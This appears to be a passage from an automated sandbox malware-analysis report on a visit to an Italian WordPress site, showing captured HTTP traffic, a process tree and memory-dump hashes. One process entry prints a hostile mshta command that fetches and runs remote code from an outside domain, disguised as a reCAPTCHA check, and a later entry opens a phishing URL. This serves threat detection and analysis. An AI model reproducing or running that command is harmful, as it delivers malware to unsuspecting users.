                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:09 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:09 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 672
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:09 UTC672INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 0a 09 24 28 27 62 6f 64 79 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 27 2e 61 76 2d 6c 61 7a 79 6c 6f 61 64 2d 76 69 64 65 6f 2d 65 6d 62 65 64 20 2e 61 76 2d 63 6c 69 63 6b 2d 74 6f 2d 70 6c 61 79 2d 6f 76 65 72 6c 61 79 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 0a 09 09 0a 09 09 69 66 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 2f 61 76 69 61 50 72 69 76 61 63 79 56 69 64 65 6f 45 6d 62 65 64 73 44 69 73 61 62 6c 65 64 2f 29 29 0a 09 09 7b 0a 09 09 09 69 66 20 28 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 20 3d 3d 3d 20 75 6e 64 65 66 69 6e 65 64 29 20 72 65 74 75 72 6e 3b 20 2f 2f 68 75 6d 61 6e 20 63 6c 69 63 6b 20 6f 6e 6c
                                                                                                                                              Data Ascii: (function($){ "use strict";$('body').on('click','.av-lazyload-video-embed .av-click-to-play-overlay', function(e){if(document.cookie.match(/aviaPrivacyVideoEmbedsDisabled/)){if (e.originalEvent === undefined) return; //human click onl


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              149192.168.2.164987989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:08 UTC530OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:09 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:09 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 3676
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:09 UTC3676INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 54 61 62 20 53 68 6f 72 74 63 6f 64 65 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69 61 5f 73 63 5f 74
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Tab Shortcode// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avia_sc_t


                                                                                                                                              Click to jump to process

                                                                                                                                              Click to jump to process

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:11:32:43
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:1
                                                                                                                                              Start time:11:32:43
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1908,i,14487549043313255646,10754558646077735091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:11:32:44
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.cipassoitalia.it/"
                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:12
                                                                                                                                              Start time:11:33:17
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\system32\mshta.exe" https://solve.jrqr.org/awjxs.captcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7c # ? ''I am not a robot - reCAPTCHA Verification ID: 3943''
                                                                                                                                              Imagebase:0x7ff7018c0000
                                                                                                                                              File size:14'848 bytes
                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:11:33:33
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                                                                                                              Imagebase:0x7ff6c52f0000
                                                                                                                                              File size:834'512 bytes
                                                                                                                                              MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:15
                                                                                                                                              Start time:11:33:33
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:9474 /prefetch:2
                                                                                                                                              Imagebase:0xf60000
                                                                                                                                              File size:828'368 bytes
                                                                                                                                              MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:11:33:34
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                                                                                                                              Imagebase:0xa90000
                                                                                                                                              File size:85'632 bytes
                                                                                                                                              MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:11:33:34
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                                                                                                                              Imagebase:0xa90000
                                                                                                                                              File size:85'632 bytes
                                                                                                                                              MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:11:33:35
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:75012 /prefetch:2
                                                                                                                                              Imagebase:0xf60000
                                                                                                                                              File size:828'368 bytes
                                                                                                                                              MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:11:33:56
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4"
                                                                                                                                              Imagebase:0x7ff6487a0000
                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:22
                                                                                                                                              Start time:11:33:57
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:3
                                                                                                                                              Imagebase:0x7ff6487a0000
                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:25
                                                                                                                                              Start time:11:33:59
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6332 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8
                                                                                                                                              Imagebase:0x7ff6487a0000
                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:26
                                                                                                                                              Start time:11:33:59
                                                                                                                                              Start date:03/01/2025
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8
                                                                                                                                              Imagebase:0x7ff6487a0000
                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Reset < >
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000C.00000002.2423393864.000001A8F9430000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A8F9430000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_12_2_1a8f9430000_mshta.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8d5651198d5e3101fdc038479a3ed0e1be6360debc8420b9976cbc0f70ef9bc4
                                                                                                                                                • Instruction ID: f04e0c1f2e3e3401dca88799757e1133a93182443a90fa8e52a6b9abb5cf9fa5
                                                                                                                                                • Opcode Fuzzy Hash: 8d5651198d5e3101fdc038479a3ed0e1be6360debc8420b9976cbc0f70ef9bc4
                                                                                                                                                • Instruction Fuzzy Hash: 0AB0120005F7C34FD70313720C6559E3F606A57210FC90AC2C049C90D7D88C1989E3A3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000C.00000002.2423393864.000001A8F9430000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A8F9430000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_12_2_1a8f9430000_mshta.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                • Instruction ID: 2f2afb38a08b35cbd6dde6b8039ecec82e817974abd2b78cd066356497e69dbc
                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                • Instruction Fuzzy Hash: 229002145964075AD41411A10C4569C614073A9250FD44580841AD0188D88D029625D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000C.00000002.2423393864.000001A8F9430000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A8F9430000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_12_2_1a8f9430000_mshta.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                • Instruction ID: 2f2afb38a08b35cbd6dde6b8039ecec82e817974abd2b78cd066356497e69dbc
                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                • Instruction Fuzzy Hash: 229002145964075AD41411A10C4569C614073A9250FD44580841AD0188D88D029625D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000C.00000002.2423393864.000001A8F9430000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A8F9430000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_12_2_1a8f9430000_mshta.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                • Instruction ID: 2f2afb38a08b35cbd6dde6b8039ecec82e817974abd2b78cd066356497e69dbc
                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                • Instruction Fuzzy Hash: 229002145964075AD41411A10C4569C614073A9250FD44580841AD0188D88D029625D3